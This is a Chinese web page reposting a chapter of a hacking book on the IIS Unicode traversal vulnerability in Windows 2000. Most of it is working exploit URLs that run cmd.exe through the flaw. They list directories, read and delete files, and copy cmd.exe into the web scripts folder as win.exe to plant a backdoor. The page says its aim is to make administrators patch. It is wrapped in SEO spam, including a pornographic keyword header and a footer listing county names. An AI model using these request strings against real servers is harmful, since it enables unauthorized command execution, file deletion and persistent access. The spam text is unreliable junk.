人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當前位置:蘿卜系統 > 網絡技術教程 > 詳細頁面

黑客攻防技術內幕-防范入侵的辦法(12)

黑客攻防技術內幕-防范入侵的辦法(12)

更新時間:2022-04-28 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。
6.9 UNICODE漏洞入侵(1)

    

6.9  UNICODE漏洞入侵

風光了很久的UNICODE漏洞是經常被入侵者利用的漏洞之一。在200151日大戰中,黑客們就普遍利用此漏洞對各國網站進行攻擊,究其原因:一是由于此漏洞剛公布不久,二是網絡安全管理員安全意識低下,對UNICODE漏洞不進行及時的修補,使入侵者通過UNICODE漏洞入侵網站得逞。

但是現在網上還有很多服務器還存在著UNICODE漏洞,此漏洞可以使一般稍懂計算機的人直接通過瀏覽器,向存有漏洞的服務器發送請求,就可以入侵存有UNICODE漏洞的服務器。

接下來將全面講述入侵者是如何利用此漏洞對網站進行入侵,也希望可以引起管理員們的安全意識,盡快對UNICODE漏洞進行修補(修補方法請讀閱3.7.1 節中UNICODE漏洞的修補)

6.9.1  用于UNICODE漏洞入侵的命令

下面以中文版Windows 2000為例,對于其他版本只需更改其編碼即可,參閱3.7.1 節中UNICODE漏洞的修補。

首先將介紹入侵者在入侵存在UNICODE漏洞的服務器時所涉及到的有關命令,其實有些命令和在DOS下使用的命令是一樣的,但如CD這一類命令則不可用。

1. dir命令

列出目標計算機的目錄。在瀏覽器的地址欄中輸入如下內容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\

或者

http://127.0.0.1/scripts /..%c0%2f../ winnt/system32/cmd.exe?/c+dir+d:\

以上內容是使用dir命令,讓存在UNICODE漏洞的服務器列出d盤的目錄,如圖6-65所示。

6-65  使用dir命令,列出d盤的目錄

2. 顯示下一個目錄

這里不使用CD命令 ,而是直接輸入路徑。如果進入d盤下的Inetpub文件,可在瀏覽器的地址欄中輸入如下內容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

如圖6-66所示。

6-66  進入d盤下的Inetpub文件

3. type命令

顯示文件內容 。可以在瀏覽器中顯示txt htm asp等格式的內容,如要顯示d盤下config.txt文件的內容,可在瀏覽器的地址欄中輸入如下內容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type +d:\config.txt 

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type +d:\config.txt

如圖6-67所示。

6-67  使用type命令顯示config.txt的內容

4. del命令

刪除文件命令。例如,要刪除d盤下的config.txt文件,可在瀏覽器的地址欄中輸入如下內容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del +d:\config.txt 

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del +d:\config.txt 

如圖6-68所示。

6-68  使用del命令刪除d盤下config.txt文件

5. copy命令

復制指定文件或同時將該文件改名,例如將dWinnt\system32下的cmd.exe程序復制到dInetpub\scripts下,并改名為win.exe,可在瀏覽器的地址欄中輸入如下內容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm d.exe d:\inetpub\scripts\win.exe

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm   d.exe d:\inetpub\scripts\win.exe

如圖6-696-70所示。

6-69  改名為win.execmd.exe程序

6-70  復制cmd.exe程序

從圖6-69中可以看到,dWinnt\system32下的cmd.exe程序成功地復制到dInetpub\scripts下并改名為win.exe



網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

網站地圖xml | 網站地圖html
主站蜘蛛池模板: 苍梧县| 万州区| 通榆县| 无锡市| 海阳市| 吕梁市| 清水县| 行唐县| 武清区| 新巴尔虎右旗| 察雅县| 遂平县| 乌拉特后旗| 教育| 东平县| 辉南县| 隆林| 清丰县| 灵寿县| 扬中市| 永康市| 普格县| 龙泉市| 潢川县| 蓝田县| 博罗县| 宁国市| 永仁县| 明水县| 淮南市| 宁都县| 双桥区| 兖州市| 镶黄旗| 五寨县| 县级市| 天柱县| 金堂县| 大田县| 克东县| 五寨县|